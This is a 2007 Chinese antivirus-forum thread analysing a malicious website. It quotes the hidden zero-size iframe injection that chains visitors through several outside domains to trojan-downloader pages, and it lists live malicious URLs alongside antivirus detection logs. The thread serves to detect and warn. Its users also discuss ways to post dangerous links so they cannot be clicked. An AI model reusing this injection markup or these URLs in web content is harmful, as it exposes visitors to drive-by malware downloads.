查看: 5560|回复: 14
收起左侧

毒网一个,大家看

[复制链接]
绅博周幸
发表于 2007-1-14 16:49:59 | 显示全部楼层 |阅读模式
dikex
发表于 2007-1-14 17:17:07 | 显示全部楼层
多层镶嵌,晕

http://ew.gqjy.net/soft/aqxg/bdfz/200608/229.html里面的:
</html><iframe src=http://q1.go.3322.org width=0 height=0 frameborder=0></iframe>


http://q1.go.3322.org/index.html又在镶嵌一次:
<HTML><HEAD>
<meta http-equiv="refresh" c>
</HEAD>
<body></body></html>


http://www.wulin7.cn/sys/nima.htm里面再次镶嵌:
<iframe src="http://www.wulin7.cn/sys/1.htm" name="zhu" width="0"height="0" frameborder="0">
<iframe src="http://www.wulin7.cn/sys/2.htm" name="zhu" width="0"height="0" frameborder="0">
<iframe src="http://www.wulin7.cn/sys/3.htm" name="zhu" width="0"height="0" frameborder="0">
<iframe src="http://www.wulin7.cn/sys/6.htm" name="zhu" width="0"height="0" frameborder="0">
<script src='http://s90.cnzz.com/stat.php?id=329517&web_id=329517' language='JavaScript' charset='gb2312'></script>


这次捉到了三个了
已隔离: 木马程序 Trojan-Downloader.JS.gen (修改) 文件: C:\Documents and Settings\Administrator\桌面\2.htm.td
已删除: 木马程序 Trojan-Downloader.VBS.Small.dc 文件: C:\Documents and Settings\Administrator\桌面\3.htm.td
已删除: 木马程序 Trojan-Downloader.HTML.Agent.br 文件: C:\Documents and Settings\Administrator\桌面\6.htm.td

http://s90.cnzz.com/stat.php?id=329517&web_id=329517重定向到的login.php文件里面竟然写着:
本站(cnzz.com)<br />仅为“挂马”提供流量统计服务,“挂马”的经营活动均与本站无任何关系!

评分

参与人数 1经验 +1 收起 理由
ALEXBLAIR + 1 感谢解答: )

查看全部评分

绅博周幸
 楼主| 发表于 2007-1-14 17:24:51 | 显示全部楼层
仅为“挂马”提供流量统计服务,“挂马”的经营活动均与本站无任何关系!
moonsilver
发表于 2007-1-14 20:19:49 | 显示全部楼层
呵呵,多谢,病毒收藏了
snaillc
发表于 2007-1-14 20:33:54 | 显示全部楼层
毒网怎么你还你还设置链接啊?要是像我们这样的小兵点了进去,那还不给毒死了啊!!
Oceanzd
发表于 2007-1-14 21:00:56 | 显示全部楼层

回复 #5 snaillc 的帖子

我会建议ALEX再制定版规,如果有危险连接就用下面的方式来添加:

  1. www.sina.com.cn
复制代码

就不会误点击了

代码为[code][/code]

评分

参与人数 1经验 +1 收起 理由
ALEXBLAIR + 1 加分鼓励,已经添加到版规中,谢谢提醒。

查看全部评分

gggh
发表于 2007-1-14 21:14:03 | 显示全部楼层

回复 #2 dikex 的帖子

我的KIS 6.0307---
2007-1-14 下午 9:14:49        恶意 HTTP 对象 <http://www.wulin7.cn/sys/2.htm>: 已检测新变种 木马程序 Trojan-Downloader.JS.gen.
2007-1-14 下午 9:14:49        恶意 HTTP 对象 <http://www.wulin7.cn/sys/2.htm>: 拒绝访问.
2007-1-14 下午 9:14:49        恶意 HTTP 对象 <http://www.wulin7.cn/sys/3.htm>: 已检测 木马程序 Trojan-Downloader.VBS.Small.dc.
2007-1-14 下午 9:14:49        恶意 HTTP 对象 <http://www.wulin7.cn/sys/3.htm>: 拒绝访问.
2007-1-14 下午 9:14:50        恶意 HTTP 对象 <http://www.wulin7.cn/sys/6.htm>: 已检测 木马程序 Trojan-Downloader.HTML.Agent.br.
2007-1-14 下午 9:14:50        恶意 HTTP 对象 <http://www.wulin7.cn/sys/6.htm>: 拒绝访问.
起点
发表于 2007-1-14 21:24:10 | 显示全部楼层
原帖由 jzhhh 于 2007-1-14 21:00 发表
我会建议ALEX再制定版规,如果有危险连接就用下面的方式来添加:

www.sina.com.cn
就不会误点击了

代码为

置顶的帖子里  s1ck 已经规定过了
可是大家都不看的
flykiss
发表于 2007-1-14 22:23:36 | 显示全部楼层
才3个啊~~  我的驱逐舰就隔离了6个 ,微点又杀了几个~~~~~~~~```
wj730327
发表于 2007-1-14 22:23:38 | 显示全部楼层
应该怎么选择,默认的是图中所指.这个意思是什么,大家一般怎么样操作

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-1 00:24 , Processed in 0.125743 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表